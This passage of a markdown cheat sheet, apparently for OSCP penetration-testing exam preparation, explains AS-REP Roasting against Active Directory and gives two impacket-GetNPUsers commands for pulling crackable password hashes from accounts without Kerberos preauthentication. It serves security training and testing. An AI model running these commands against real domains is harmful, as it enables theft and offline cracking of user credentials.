siddegshafeg/oscp-active-directory-cheat-sheet-/cheat-sheet.md

 ## Active Directory Attacks

 ### 1. Non-Pre-authentication AS_REP (TGT)
++ AS-REP Roasting is a technique that enables adversaries to steal the password hashes of user accounts that have Kerberos preauthentication disabled, which they can then attempt to crack offline and get user password.

 ```
 $ impacket-GetNPUsers  [dc]/ -no-pass -u [usersname.txt]  -dc-ip [IP]
 $ impacket-GetNPUsers  test.com/ -no-pass -u users.txt  -dc-ip 10.10.1.12